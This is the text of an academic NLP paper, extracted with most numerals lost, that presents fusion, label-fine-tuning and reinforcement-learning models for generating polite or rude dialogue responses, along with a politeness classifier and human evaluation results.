regular-to-stylistic pairs are usually un- available. we present three weakly-supervised models that can generate diverse, polite (or rude) dialogue responses without parallel data. our late fusion model (fusion) merges the decoder of an encoder-attention-decoder dia- logue model with a language model trained on stand-alone polite utterances. our label-fine- tuning (lft) model prepends to each source sequence a politeness-score scaled label (pre- dicted by our state-of-the-art politeness classi- fier) during training, and at test time is able to generate polite, neutral, and rude responses by simply scaling the label embedding by the cor- responding score. our reinforcement learn- ing model (polite-rl) encourages politeness generation by assigning rewards proportional to the politeness classifier score of the sam- pled response. we also present two retrieval- based, polite dialogue model baselines. hu- man evaluation validates that while the fu- sion and the retrieval-based models achieve politeness with poorer context-relevance, the lft and polite-rl models can produce sig- nificantly more polite responses without sacri- ficing dialogue quality. introduction generating stylistic, personality-based language is crucial to developing engaging, convincing, and trustworthy conversational agents, for their effec- tive application in intelligent tutoring, home assis- tance, online reservations/purchasing, health care, etc. most current chatbots and conversational mod- els lack any such style, which can be a social issue because human users might learn biased styles from such interactions, e.g., kids learning to be rude be- cause the dialogue system encourages short, curt re- sponses, and also does not itself use politeness to set an example. in this work, we focus on the impor- tant and diverse paralinguistic style axis of polite- ness vs. rudeness (brown and levinson, ). generating stylistic dialogue responses is a sub- stantially challenging task because the generated re- sponse needs to be syntactically and semantically fluent, contextually-relevant to the conversation, as well as convey accurate paralinguistic features. this is further complicated by the fact that content and style are only available in separate unpaired datasets, as opposed to translation-type parallel datasets con- taining regular-to-stylistic text pairs. hence, we need indirectly-supervised models that can incorpo- rate style into the generated response in absence of parallel data (i.e., where the training data for the conversation, versus style components, comes from two different datasets or domains), while still main- taining conversation relevance. in this work, we present three such weakly- supervised models that can generate diverse, nat- ural, and contextually-relevant polite (and rude) di- https://qz.com/ /parents-are-worried-the-amazon- echo-is-conditioning-their-kids-to-be-rude/ the first version of this paper with the three fusion, discrete-lft, and polite-rl models was submitted on oct , . the two retrieval baselines and the continuous version transactions of the association for computational linguistics, vol. , pp. – , . action editor: colin cherry. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. alogue responses, using data from separate style and dialogue domains: the stanford politeness cor- pus (danescu-niculescu-mizil et al., ) with wikipedia and stack exchange requests, and the movietriples dialogue corpus (serban et al., ) with imsdb movie scripts, respectively. each of our three models is based on a state-of-the-art polite- ness classifier and a sequence-to-sequence dialogue model. the first model (fusion) employs a late fu- sion technique to merge the response generation de- coder of the dialogue model with a language model trained on polite utterances chosen by the politeness classifier. the second label-fine-tuning (lft) model prepends to the input utterance a single politeness la- bel whose embedding is continuously scaled by the politeness score of the target sequence during train- ing. this score is determined by feeding the cor- responding ground-truth target sequence to our po- liteness classifier. during test time, we show that the lft model is able to control the politeness level of generated responses by simply scaling the la- bel’s embedding by the continuous target politeness score of our choice. our third reinforcement-based model (polite-rl) encourages politeness generation by using the continuous-scale politeness score of the decoder-sampled sentence as a reward (via mixed- objective policy gradient methods), i.e., polite utter- ances are encouraged with positive reward, and rude ones discouraged with negative reward. hence, our models only need a style classifier (without parallel data) to automatically influence and encourage continuous-scale stylistic language generation in a complex dialogue setup, which also requires maintaining relevance to conversational context. each of these models requires minimal changes to the architecture of either the underly- ing sequence-to-sequence (seq seq) dialogue base model or the style classifier, and hence can mod- ularly update the architecture with the latest state- of-the-art dialogue models or style classifiers (and for diverse styles). in addition, we also employ two retrieval-based models, where we output the re- sponse which has the highest match with the in- put context from a set of classifier-picked polite responses or manually-picked generic polite utter- of the lft model were added to the feb , resubmission based on reviewer discussions. ances. these two retrieval models serve as parallel investigations on the performance of our three pro- posed generative models above. we conducted multiple human evaluations (for style and dialogue quality) on amazon mechani- cal turk (mturk) (buhrmester et al., ) for all three models plus the base sequence-to-sequence di- alogue model and the retrieval-based models, and show that while the fusion and the two retrieval models increase the politeness level of responses at the cost of poorer dialogue quality, both our lft and polite-rl models can successfully produce po- lite responses (capturing several politeness strategies discussed by brown and levinson ( )), without sacrificing dialogue coherence and relevance com- pared to the base seq seq model (hence better bal- ance between politeness and dialogue quality). we also compare the output dialogue politeness levels of the continuous lft model for three different po- liteness levels. finally, we present several detailed qualitative and quantitative analyses, including pos- itive and negative output examples, automatic metric results on output responses, classifier error analysis, and visualization of the rl rewards. related works . models for style transfer style transfer with parallel data there have been multiple works on style transfer with parallel data. these tasks can often be solved by directly ap- plying some variation of translation-based seq seq model discussed in the previous section. for ex- ample, xu et al. ( ) use a phrase-based statis- tical model, and jhamtani et al. ( ) use a stan- dard seq seq model to convert modern language to shakespeare-style language by treating style transfer as a translation task. some labeled sequence trans- duction methods have also been proposed (kobus et al., ; yamagishi et al., ; johnson et al., ). for example, kikuchi et al. ( ) are able to control the length of the summarization text by feeding to the seq seq base model a label that in- dicates the intended output length in addition to the source input. our lft model also adopts this la- beling idea, and is able to handle a similar situation but without parallel data, because by labeling each target sequence in the training set with its politeness classifier score, we are essentially converting non- parallel data to (noisy) parallel data (by using a clas- sifier with high accuracy). style transfer without parallel data several previous works have looked at style transfer with- out parallel data, in both vision (gatys et al., ; zhu et al., ; liu and tuzel, ; liu et al., ; taigman et al., ; kim et al., ; yi et al., ), and text (sennrich et al., a; hu et al., ; ghosh et al., ; zhao et al., ; mueller et al., ; wang et al., ; luan et al., ). among these models, some are bag-of-words based, i.e., they use style-related keywords to annotate the target sequences in the training set. for example, to control how formal the output sequences are in a en-de translation task, sennrich et al. ( a) la- beled each target sequence based on whether it con- tains formal or informal verbs and pronouns (hon- orifics). to build a language model that generates utterances with the desired style, ficler and gold- berg ( ) annotated their text with meta-data and keywords/pos tags based heuristics, while ghosh et al. ( ) also adopted keyword spotting based on a dictionary of emotional words. the basic ideas of their models are similar to that of our lft model. however, these keyword-spotting approaches do not fully extend to our politeness generation task, be- cause politeness strategies follow complex patterns of grammar, word order, and phrasing (danescu- niculescu-mizil et al., ). for example, the po- liteness of please depends on where it occurs in a sentence, and what other politeness markers it co- occurs with (e.g., ‘could/would you’ style counter- factual modals vs. ‘can/will you’ style indicative modals). therefore, our novel polite dialogue mod- els are based on an accurate neural classifier, which is better at capturing several compositional paralin- guistic features (as visualized in aubakirova and bansal ( ), whose politeness classifier we ex- tend). moreover, our lft and polite-rl models can generate a continuum of style levels based on the continuously-scaled (by the politeness score) label embedding or reinforcement rewards. lastly, there have also been style transfer mod- els that rely on the latent representation of text and use variational auto-encoders or cross-alignment to disentangle the representation of content and style in text (hu et al., ; shen et al., ; zhao et al., ; fu et al., ). during inference time, the latent style representation is combined with new content to generate stylized, content-preserving text. although both fall into the category of style transfer, our task differs in two important aspects from their tasks. first, as opposed to the task of strict content preservation when rephrasing a sentence to a differ- ent style, our task is about maintaining good rele- vance to the context when adding style, especially useful for dialogue-based tasks. another distinc- tive trait of our task is that politeness resides in a spectrum rather than a fixed category or topic (e.g., shakespearean), and our models can treat politeness as a continuum, i.e., controlling the politeness level by adjusting the fusion rate in the fusion model, the magnitude of the continuous label in the lft model, or the rl weight in the polite-rl model. . multi-task learning and style transfer in order to obtain a persona-based conversational agent, luan et al. ( ) proposed a multi-task learning (mtl) based approach: they train a seq seq model with conversation data and an au- toencoder with non-conversational persona-related data from target speakers, and share the decoder parameters of these two models so that the gener- ated responses can be adapted to the style of the target-speaker. this way of incorporating mtl into seq seq learning was first investigated by dong et al. ( ) and luong et al. ( ) to achieve mul- tilingual nmt. in addition, sennrich et al. ( b) also employed mtl to improve nmt models with monolingual (non-parallel) data. these approaches are related to our fusion model, because we use our classifier to obtain noisy polite target sequences (non-parallel data) that a polite language model trains on; next, during inference, we combine the parameters of the language model with a genera- tive dialogue model trained on parallel data. in gen- eral, our models are also related to previous works like johnson et al. ( ), who adopted labeled se- quence transduction methods for mtl tasks, be- cause our task also involves adapting generated re- sponses to different politeness styles and optimizing two sub-tasks’ (namely response and politeness gen- eration) loss functions (related to a multi-task setup). . politeness studies danescu-niculescu-mizil et al. ( ) created the stanford politeness corpus and trained an svm classifier using a list of useful linguistic features based on strategies from brown and levinson’s theory of politeness (brown and levinson, ). aubakirova and bansal ( ) recently took an end- to-end neural approach to this politeness classifi- cation task by training a cnn model that directly learns to identify polite requests without using any hand-engineered features, while still improving on prediction accuracy. they also visualized what fea- tures the cnn model was learning and discovered some new features along the way. our classifier mainly extends their work by adding a bi-directional lstm layer (hochreiter and schmidhuber, ; schuster and paliwal, ) before the cnn layer to capture long-distance relationships in the sentence, which leads to higher cross-domain performance. a related early work in personality-based dia- logue is mairesse and walker ( ), who stud- ied introvert/extrovert personality language based on templated content and sentence planning (via personality dimensions such as hedges, tag ques- tions, negations, subject implicitness, etc.). relat- edly, sennrich et al. ( a) use an english to ger- man translation task to present a model that can gen- erate target sequences that are either formal or infor- mal, specifically based on honorifics-related verbs and pronouns. our task is more general, taking into account several politeness-related paralinguis- tic features of brown and levinson ( ) and al- lowing end-to-end trainable stylistic dialogue gen- eration with a polite-to-rude spectrum (based on a politeness classifier, without relying on parallel data). moreover, our approaches allow simply re- placing the politeness classifier with any other emo- tion or personality based language classifier to gen- erate stylistic dialogue for that new style dimension. politeness classification model in order to develop an accurate politeness classifier for effective use in stylistic dialogue response gener- ation, we extend and improve upon the state-of-the- art cnn model of aubakirova and bansal ( ), and propose a bi-directional lstm followed by a convolutional layer (see figure ), in order to both s s s s embedding convolution layer polite rude lstm lstm lstm lstm lstm lstm lstm lstm concat concat concat concat softmax max-pooling figure : our lstm-cnn politeness classifier. capture long-distance relationships in the sentence as well as windowed filter based features. for a sentence v :n (where each token vi is a d-dim word embedding vector), the lstm layer first produces hidden states h :n (where ht is the concatenation of forward and backward hidden states at time step t). a filter m is then applied on a window of u hidden states. this produces a convolution feature ci = f(m ∗ vi:i+u− + b), where f is a non-linear function and b is a bias term. every feature map c ∈ rn−u+ is applied to each window, so that c = [c , ...,cn−u+ ]. the output of the convolu- tional layer is then fed to a max-pooling layer (col- lobert et al., ) which gives c = max{c} for the filter. filters of various sizes are used to ob- tain multiple features. the result is then passed to a fully-connected softmax layer that outputs proba- bilities over two labels, namely polite and rude. our classification model achieves compara- ble in-domain accuracy and improved cross- domain accuracy over the state-of-the-art results reported in danescu-niculescu-mizil et al. ( ) and aubakirova and bansal ( ). we will discuss these results in detail in section . polite-style dialogue models in this section, we first describe our base dialogue model, i.e., the core (backbone) dialogue architec- ture upon which the three proposed politeness mod- input s s s response by seq seq q q t t <start> response by lm g g g <end> q figure : fusion model: the output probability distribu- tions of the decoder and the polite-lm are linearly mixed to generate the final decoded outputs. els are built, and then present these three models that can generate polite dialogue responses. as a paral- lel investigation on the performance of our proposed models, we also employ two retrieval-based polite dialogue models toward the end. . base seq seq dialogue model our base dialogue model is a simple sequence-to- sequence (seq seq) model that consists of a two- layer bi-directional lstm-rnn encoder to encode the conversation history turns, and a four-layer lstm-rnn decoder to generate the response. ad- ditive attention from the output of the encoder is ap- plied to the last layer of the decoder. this archi- tecture is almost identical to that proposed by bah- danau et al. ( ), except with more layers (simi- lar to shao et al. ( )). our base dialogue model achieves perplexity and word error rate results on par with those reported for the popular hierarchical hred models in serban et al. ( ), thus serving as a good base model to incorporate style into. de- tails will be discussed in section . . fusion model inspired by the ‘late fusion’ approach in venu- gopalan et al. ( ), our fusion model (fig. ) combines the response generation decoder of the base seq seq dialogue model with a language model (polite-lm) trained exclusively on polite utterances. these utterances are chosen by feeding the classifier all response utterances in the movietriples training set, and only keeping those with politeness scores great than a certain threshold (set to . in our ex- periments, as will be discussed in section . ). the polite-lm model is a two-layer lstm-rnn based on jozefowicz et al. ( ). during inference time, we used the language <label> s s s <start> g g g t t t <end> input generated response politeness classifier target politeness score figure : label-fine-tuning model: during training, the embedding of the prepended label is scaled by the style classifier’s continuous score on the ground-truth (target) sequence. during testing, we scale the embedding of the label by the desired (continuous) politeness score of the generated response. model to re-score the final output of the seq seq decoder (for each time step) by computing a lin- ear combination of the output vocabulary distribu- tions proposed by the seq seq model and polite- lm. specifically, let ps st and p lm t denote the output probability distributions proposed by the seq seq model and the lm model at time t, respectively. the final ‘fused’ distribution pt for that time step is: pt = αp s s t + ( −α)plmt ( ) where the fusion ratio α is a hyperparameter that in- dicates how much seq seq output will influence the final output. . label-fine-tuning model there are at least two drawbacks of the fusion model. first, half of its output is determined by a po- lite language model that has not attended to the con- versation context, making the response more likely to be irrelevant. second, the model does not learn politeness during training, but is forced to be polite only during inference time. to address these two is- sues, we present our label-fine-tuning (lft) model, which prepends a predicted continuous style label at the beginning of each input sentence to specify the intended politeness level. specifically, we add to the vocabulary a single po- liteness label and attach with it a trainable word em- bedding, just like what we would do to a normal to- ken. then, the way we make it continuous is by scal- ing its embedding vector with the (intended) polite- ness score of the target sequence. during training, this score is obtained by feeding the ground-truth target sequence (response) to the politeness classi- input s s s <start> g g g t t t <end> generated response target <start> h h h h h h <end> sampled response politeness classifier rl loss mle loss rl loss + total loss figure : polite-rl model: upper-right shows max-likelihood (ml) training with generated and ground-truth target sequences; lower-right shows rl training with a randomly sampled response generated by the model and the reward it generates after getting fed into the style classifier. note that the attention mechanism is not shown here for clarity. fier (see figure ), while during test time, we are free to scale the prepended politeness label with dif- ferent scores of our choice (i.e., when we want the model to generate a polite response, we scale the la- bel’s embedding by a score between . and . , whereas, to generate a rude response, we scale the embedding by a score between . and . ). this ap- proach is related to the ‘numerically-grounded’ lan- guage model (spithourakis et al., ), except that we scale the politeness label embedding by its corre- sponding politeness score, rather than concatenating the two as input to the lstm. thus, the lft model is able to simultaneously produce polite, neutral and rude responses depend- ing on the prepended label, similar to recent multi- label, multi-space, and zero-shot machine trans- lation work using language identity or style la- bels (sennrich et al., a; johnson et al., ; ghosh et al., ). intuitively, this prepended label serves as the prior for the intended style of the gen- erated response sequence, while the source utterance serves as the prior for the content of the generated sequence. in other words, the label and the source sentence cooperatively determine what the overall response looks like. although we trained the politeness classifier to be binary, its outputs are probabilities ranging from . to . . this allows us to interpret the outputs as continuous politeness scores. note that the position of the label did not affect the results much (e.g., sennrich et al. ( a) appended the label at the end of the input sequence). moreover, our models use a bidi- rectional encoder, which does not distinguish between the be- ginning and end of the source sequence. . polite reinforcement learning model the lft model incorporates style more directly into its training procedure than the fusion model, but it still does not fully exploit the value of the style clas- sifier since it only supervises the dialogue model once by initially classifying the style of all the tar- get sequences in the training set. ideally we would want the classifier to constantly monitor and influ- ence what style the model produces. moreover, many contexts do not naturally elicit a polite re- sponse, in which case we do not want to force the model to generate an utterance that matches the target politeness score, but rather to ask the model to generate as polite and natural a response as it could. these limitations motivate us to propose the third model: polite reinforcement learning model (polite-rl), where the style classifier regularly up- dates the model parameters (via sampling-based pol- icy gradient) with continuous-spectrum rewards that encourage decoder-generated response samples to be polite and discourage them from being rude. following work from paulus et al. ( ), our loss function consists of two terms. the first term is the traditional maximum likelihood loss (lml ), which we refer to as the teacher forcing part. the other one is the reinforcement learning loss (lrl ) based on politeness scores, which we refer to as the reinforce part. the total loss l then takes the form: l = lml + β lrl ( ) for example, it is hard to be polite in answering ques- tions like “what’s your name?” (the most “legitimate” answer would be “my name is xx.”, rather than “thanks for asking! my humble name is xx if you would allow me to say so.”) where β is a hyperparameter indicating how much weight we want to give to the style reward compo- nent of the loss. the teacher forcing part minimizes the average of the maximum-likelihood loss at each decoding step. specifically, let y∗ = {y∗ ,y∗ , ...,y∗n} be the ground-truth response for a given source (conversation history) utterance sequence x. the maximum-likelihood training objective is the min- imization of the loss: lml = − n∑ t= log p(y∗t |y∗ , ...,y∗t− ,x). ( ) we use a policy gradient method (williams, ; sutton et al., ) to calculate the second term in the objective function. specifically, we sam- ple a generated response for each input sequence (conversation history) x, and assign to it a reward r, which in our case is the politeness classifier’s probability of the response classified as polite. let ys = {ys ,ys , ...,ysn} be the sampled response, then the reinforce part of the loss is: lrl = −(r−rb) n∑ t= log p(yst |ys , ...,yst− ,x) ( ) where rb is a baseline that helps reduce variance during training (ranzato et al., ). note that we can invert the classifier scores or re- ward (by flipping the first minus sign in eq. ), if we want to encourage rudeness as the style, instead of politeness. this also shows that an advantage of our implementations of the lft model over the polite-rl model (at the cost of shallower training) is that the lft model can multitask to simultaneously produce responses of different style labels at test time, whereas reward-based reinforcement learning can only work in one direction at a time (based on the reward sign). . retrieval-based models we employ two retrieval-based baseline models as a sanity check to the proposed approaches’ perfor- however, to make the reward-based model capable of mul- titasking, one could also prepend various politeness labels to each of the context in the training set (thus generating several examples out of one context), and encourage the generated re- sponse to be consistent with the given label. we will explore this extension in future work. mance: the first with oracle-level fluency, the second with additional oracle-level politeness. classifier-based retrieval following lowe et al. ( ), for a [x ,y,x ] triple, our retrieval model treats the context (x ,y ) and each response (x ) as two documents and converts them to their tf-idf based vectors (ramos, ) to check for similarity. specifically, we first obtain all candidate responses in the training set that are polite, and calculate their tf-idf vectors. then for each context tf-idf vec- tor in the test set, we calculate its cosine similarity with that of each such polite-classified candidate re- sponse, and output the one with the highest value. intuitively, for each context we are choosing a re- sponse that is both polite and most relevant to (hav- ing the most word overlaps with) the context. generic- this approach is similar to the one above but uses the manually-chosen most-polite generic utterances as candidate responses for each context. specifically, we collect all ground-truth po- lite requests from the stanford politeness corpus, split each one into sentences, and then manually pick the most frequent polite sentences. we then determine which one to retrieve as a response for each input context, based again on the tf-idf vec- tor similarity method described above. experimental setup . datasets as discussed above, we propose models that can deal with style data coming from an unpaired, non- parallel domain, different from the domain of the di- alogue dataset. for our style (politeness) domain, we use the stanford politeness corpus (danescu- niculescu-mizil et al., ), which contains a col- lection of requests from wikipedia (wiki) editor’s we treat only responses in the higher, more-accurate per- centile of [ . , . ] range as polite (and [ . , . ] range as rude). the final polite sentences for generic- are “thanks.”, “can you help?”, “can you clarify?”, “no problem.”, “you’re welcome.”, “interesting question.”, “thanks for the answer.”, “could you help please?”, “can you elaborate?” and “nice.”. the rejected ones are “what have you tried?” and “what do you think?”. this shortlist needed some human filtering be- cause in the stanford politeness corpus, each polite example consists of two sentences, and sometimes not both of them are polite, i.e., one of them could be neutral (more generic and task- based). talk pages and the stack exchange (se) question- answering communities. based on scores from hu- man annotators, these requests are labeled with ei- ther polite or rude, with each class equally consist- ing of , requests for the wikipedia domain and , requests for the stack exchange domain. for the content (dialogue) domain, we use the popular movietriples dialogue corpus (serban et al., ), which contains k conversations extracted from imsdb movie scripts in x-y-x triplet-utterance for- mat, where x and y correspond to two movie char- acters (and the model’s task is to generate the last response). . evaluation methods human to evaluate our models’ ability to gen- erate polite responses without sacrificing dialogue quality, we conducted several comprehensive hu- man evaluation studies on amazon mechanical turk (mturk). specifically, we compare the three stylis- tic models w.r.t. the base model on both dialogue quality (i.e., context relevance and coherence) and politeness level. for this, we randomly sampled contexts covering all types of conversations and their generated responses from the seq seq base model, the three stylistic models, and the retrieval- based models. for each source input, the six re- sponses are randomly shuffled to anonymize model identities. each response was then annotated by two human evaluators that were located in the us, had an approval rate greater than %, and had at least , approved hits (human intelligence tasks) on record (to prevent those who had just started using mturk and hence unconditionally enjoyed a high acceptance rate.). all our human evaluations are performed by two annotators (for both dialogue quality and politeness level) in order to calculate inter-rater agreement, for which we employ cohens kappa κ (cohen, ), a score that measures the level of inter-rater agreement between two annota- tors on a classification problem (artstein and poe- we opted for dialogue quality rather than several separated, fine-grained metrics such as relevance, specificity, informative- ness because lowe et al. ( ) found that little additional in- formation was provided by adding in more metrics on top of overall dialogue quality, and it also confused mturkers in many scenarios. we had similar observations in our initial human study on mturk. sio, ). for both dialogue quality and polite- ness evaluations, the human raters were shown the conversation context (input) and the six shuffled re- sponses (from the six models). clear instructions (closely following those from wang et al. ( )) corresponding to each score were shown in the in- terface. more specifically, we asked the annota- tors to first read the context and each of the gener- ated/retrieved responses, and assign a score to each response. they then scored each response on a five- point likert scale (likert, ) (for both polite- ness and dialogue quality), hence providing absolute measurements but in an overall comparative (rela- tive) setting. we explicitly stated that it is possible for them to find some conversation disconnected or lacking context, and encouraged them to make the best guess when in doubt. using similar instruc- tions (and a -sized sample), we also performed a separate -way lft model comparison by setting its target politeness scores to . , . , and . , re- spectively. automatic since there do not exist ground-truth stylized versions of the response to the movietriples conversations, we only use automatic evaluation metrics as complementary and trend-verification in- formation to the primary human perception studies in this work: we compute bleu (a phrase-matching based metric; (papineni et al., )) as an approx- imation of dialogue quality as used by some previ- ous work (ritter et al., ; galley et al., ; li et al., c). note that we choose to report bleu scores not to draw any immediate conclusion (liu et al. ( ) found that bleu does not corre- late well with human studies on dialogue quality), but rather to check for match with the trends from the likert scale is a bipolar scaling method that maps each score to a text item that describes the score, e.g., our polite- ness level interface uses ‘polite’, ‘slightly polite’, ‘neutral’, ‘slightly rude’, ‘rude’; and our dialogue quality study uses ‘very good’, ‘good’, ‘acceptable’, ‘poor’, and ‘very poor’, in- stead of the abstract scores - . note that we did not adopt pairwise comparisons because first, it will create several inde- pendent sets of pairwise results ( sets in our case), which also raises the cost substantially, and secondly, pairwise comparison does not tell us “by how much” a response is better/equal/worse than the other. in contrast, our absolute scores can help future research compare more directly to our results. we will release our detailed instructions and mturk interfaces, plus our anno- tation scores on our webpage. human evaluation. we also compute the politeness classifier’s scores as an approximation of politeness level. sec. . discusses these results. . training details we now present some important training details. embedding initialization for all our models, we initialized the embedding matrix with word vec trained on google news dataset (about billion words) (mikolov et al., ); we use xavier initializer (glorot and bengio, ) for out-of- vocabulary words. pretraining following serban et al. ( ), we pretrained the seq seq base model for epochs with q-a subtle corpus (ameixa et al., ), which contains around . m movie subtitle q&a pairs. implementation details we used -dim em- beddings, the adamoptimizer (kingma and ba, ) with a learning rate of . , and a dropout rate of . . all models were trained with a mini- batch of size . the classifier was trained for epochs, and the three proposed stylistic models were each trained for epochs. the polite language model used in the fusion model was trained until there was no improvement for perplexity on a held- out dev-set (all tuning decisions were made on the respective dev-sets). we use a balanced value of . for the fusion ratio (α in eq. ), and . for the rl weight (β in eq. ) after some light empirical tun- ing. due also to the nearly perfect balance between the number of polite and rude examples in the stan- ford politeness corpus, we set the baseline reward of polite-rl (rb in eq. ) to a constant . at all times. note that for effective and non-confusing mturk studies, for all our models (the base model we will add all reproducibility details and more analysis examples in a post-publication supplement on our webpage. https://code.google.com/archive/p/ word vec/ we also tried using a self-critical baseline as in rennie et al. ( ), but found that our way of setting the constant-based baseline led to better responses. we speculate that this is be- cause a self-critical approach tries to make an utterance as po- lite as possible, which usually leads to a few very generic and very polite responses at convergence (because the model gets a positive reward only when the sampled utterance is more polite than the greedy-decoded one). wiki se svm . % . % cnn . % . % lstm-cnn . % . % table : politeness classification accuracies. top results are boldfaced. and the three stylistic models), we avoid unk to- kens to appear in the generated response, by not back-propagating the mle loss for these tokens. we also do the same for a short list (around ) of very offensive swear words (from wiktionary). results in this results section, we first briefly present our po- liteness classifier (sec. ) and base dialogue model (sec. . ) results, and then focus on the stylistic- dialogue results (retrieval and generative). . politeness classification results following danescu-niculescu-mizil et al. ( ), we use accuracy (i.e., percentage of correctly la- beled messages for binary polite/rude labels) to eval- uate our politeness classifier’s generalization ability. specifically, we used data from the training set of wiki, and test on both the test set of wiki and the entire se (stack exchange) corpus. we used the same train-validation-test split setup ( : : ) as in aubakirova and bansal ( ). as shown in table , our lstm-cnn model improved cross- domain accuracy (while maintaining comparable in- domain accuracy) compared to that of the svm and cnn models reported in aubakirova and bansal ( ). this is similar to how zhou et al. ( ) also found that a combination of lstm-rnns and cnns is superior to an lstm-rnn or cnn alone for sentiment classification, likely because the joint model captures both long-distance relationships as well as local windowed filter-based features, and this could make it easier to separate in-domain and out- of-domain properties. we also observe more im- provement on cross-domain accuracy because it has much more space for improvement, as opposed to note that this train/dev/test split is only for verifying the strength of the classification model. the classifier used for the three proposed polite-dialogue models was trained on the en- tire stanford politeness corpus (due to the small amount of politeness-labeled data available). model ppl ppl@l wer wer@l rnn . . . . hred . . . . hred-bidir. . . . . seq seq . . . . table : ppl, wer results computed on {u ,u ,u } and ppl@l, wer@l computed on {u } conditioned on {u ,u }. lower is better for all metrics. top results are boldfaced. in-domain accuracy which is already very close to human performance. the higher accuracy is also important because we need a cross-domain-accurate style classifier so that it can effectively stylize re- sponses in diverse dialogue corpora domains such as movietriples. . base dialogue model results next, in table , we show that our starting point, base dialogue model is comparable in quality to a popular, representative previous model of serban et al. ( ), trained on the same corpora with sim- ilar model architectures. we use their perplexity (ppl) and word error rate (wer) metrics. in or- der to have a meaningful perplexity (i.e., the prob- ability of regenerating a reference response) com- parison between two language generation models, they should have the same vocabulary set. since the vocabulary of our politeness dialogue models is a combination of vocabulary sets drawn from the movietriples and stanford politeness corpora, for fair comparison in this section, we separately train a base seq seq model following exactly the vocabu- lary ( , most frequent tokens, plus an unk for the rest) and preprocessing protocols from serban et al. ( ). we bootstrapped the model with epochs on the subtle corpus (see sec. . ), and then trained on movietriples until there was no improvement on perplexity for the validation set. the comparison for this base model with their hierarchical-encoder hred models is presented in table . as shown, we get comparable results overall on all metrics, and hence we have a good starting-point dialogue model, to which we add politeness, via the following three approaches. . stylistic dialogue model results primary human evaluation results in this sec- tion, we present our primary human evaluation politeness quality difference retrieval . . . generic- . . . seq seq . . . fusion . . . lft . . . polite-rl . . . table : mturk human evaluation results on politeness level and dialogue quality (as well as the absolute value difference between the two, to show balance) of the re- trieval models, seq seq and the three proposed genera- tive models (avg. of two annotators is shown here). top results are boldfaced. (mturk) results on both politeness level and dia- logue quality (context-relevance) of the generated response, based on two annotators and a -sized test sample. table shows the annotator-average scores for each of these two metrics and their ab- solute difference, based on our likert scales of to (see sec. . ). we can first see that all three of our stylistic generative models improve on polite- ness compared to the seq seq base model. how- ever, the fusion model’s politeness gain is not sta- tistically significant, and moreover it achieves this minor politeness level improvement at the cost of significantly compromising dialogue quality (be- cause its output is half-determined by a standalone politeness-trained lm that ignores context). next, we see that the lft model is the most po- lite (stat. significance of p < . over the seq seq model), and also has dialogue quality close (statisti- cally equal) to that of seq seq. our final polite-rl model wins over seq seq on politeness (stat. sig- nificance of p < . ) as well as achieves a small improvement in dialogue quality (though not at stat. significance level; but it is stat. significantly bet- ter in quality than retrieval, generic- and fu- sion.). moreover, the politeness levels of the lft and polite-rl models are statistically equal. there- fore, both models, with their training depth and mul- titasking trade-offs (see sec. ), can produce strong levels of stylistic content, without harming context- relevance. lastly, we can also see that our two retrieval- based models are both very polite (but not stat. sig- we test stat. significance via the bootstrap test (noreen, ; efron and tibshirani, ) with k samples. nificantly better over lft); and as expected, they both have dialogue quality lower than seq seq, polite-rl and lft (stat. significance of p < . ). they also feature two of the worst balances between average politeness and dialogue quality score. this is the type of sacrifice we want to avoid from im- posing on dialogue quality when building a stylistic dialogue model. for inter-annotator agreement, the kappa score was . (fair ) on dialogue quality and . (moderate) on politeness. if we employ a collapsed- likert version, where the more ambiguous and ex- treme scores of { , } and { , } are bucketed to- gether, we obtained a kappa score of . (mod- erate) on dialogue quality and . (moderate) on politeness. human evaluation results on -way lft mod- els we also present results on a -way politeness level comparison mturk study among the polite- lft, neutral-lft, and rude-lft models, i.e., the lft model with three levels (scores) of scaling the prepended style label, corresponding to polite- ness scores . , . and . , respectively (table , continuous-lft column). the table shows that polite-lft is significantly more polite than neutral- lft (stat. significance of p < . ), and neutral- lft is in turn more polite than rude-lft (stat. sig- nificance of p < . ). for inter-annotator agree- ment on this -way lft study, we get a kappa of . (moderate), and . (substantial) for the collapsed-likert case. we also experimented earlier with a discrete ver- sion of lft, where we treated responses in the [ . , . ] range as polite, [ . , . ] as neutral, and [ . , . ] as rude. instead of scaling a single label embedding with continuous politeness scores (as de- scribed in section . ), we assigned to each response one of these three labels with no scaling, accord- ing to its corresponding politeness bin. the human evaluation scores for that model were . , . and . , respectively, which features less score differ- ence between neutral and rude (table discrete- these levels were defined by landis and koch ( ); also see https://en.wikipedia.org/wiki/cohens_kappa as discussed in weijters et al. ( ), james et al. ( ), and https://en.wikipedia.org/wiki/likert_ scale, the ‘central tendency bias’ makes raters avoid using the two extreme response categories. continuous-lft discrete-lft polite . . neutral . . rude . . table : mturk human evaluation results on politeness level of lft models, for both the continuous and the discrete versions. lft column). automatic metric evaluation results as dis- cussed in sec. . , we also use some automatic eval- uation metrics to complement and verify the mturk human study results. in table , we present the av- erage politeness classifier and bleu- scores of re- sponses from each model. first, we can see that our politeness classifier agrees reasonably well with the human politeness judgments in table , since both identify the retrieval-based models and lft as the most polite, followed by polite-rl and fusion in descending order. we quantified this ‘agreement’ concretely, and found high correlation between the six human politeness scores (table politeness col- umn) and the six automatic classifier scores (ta- ble politeness score column): pearson correla- tion is . (stat. significance p = . ), and spearman’s rank-order correlation is . (p = . ). next, for bleu scores, although these scores (as percentages) are very low (consistent with the observation in ritter et al. ( ) and li et al. ( b)), their relative system-ranking still roughly agrees with that of human judgments — we found reasonably high correlation between human dia- logue quality and bleu (based on the six scores in table quality column and table bleu- col- umn): pearson correlation is . (stat. signifi- cance p = . ), and spearman’s rank-order cor- relation is . (p = . ). hence, overall, the automatic metric evaluation again shows that without politeness training, the base dialogue model produces neutral responses on average ( . score), while the retrieval-based mod- els and all three proposed generative models im- prove on politeness score. also, the bleu scores show, similar to the human study results in table , that among the three proposed models, the fusion model sacrifices the most dialog quality to become more polite, whereas the lft and rl models main- politeness score bleu- retrieval . . generic- . . seq seq . . fusion . . lft . . polite-rl . . table : automatic metrics: avg. politeness and bleu- scores for the two retrieval models, seq seq and three proposed models. also, the politeness score of neutral- lft and rude-lft are . , . , resp. top results are boldfaced. target sequence score polite examples well , thanks . that ’s . i appreciate that . . 〈num〉 , 〈num〉 of them in los angeles . i checked . nice work , though . . nah . i have curfew . he starts to walk away , then stops . quincy oh , by the way . congratulations . . thank you , ma’am . um , may i ask what this is regarding ? . hi , 〈person〉 . how are you ? . i know . amazing . . rude examples you really should pay more attention to what you read , 〈person〉 . . they were in a car accident . . you calling more of your stupid friends again ? ya prick . . are you a bad boy ? . then she ’s a liar . . excuse me , does 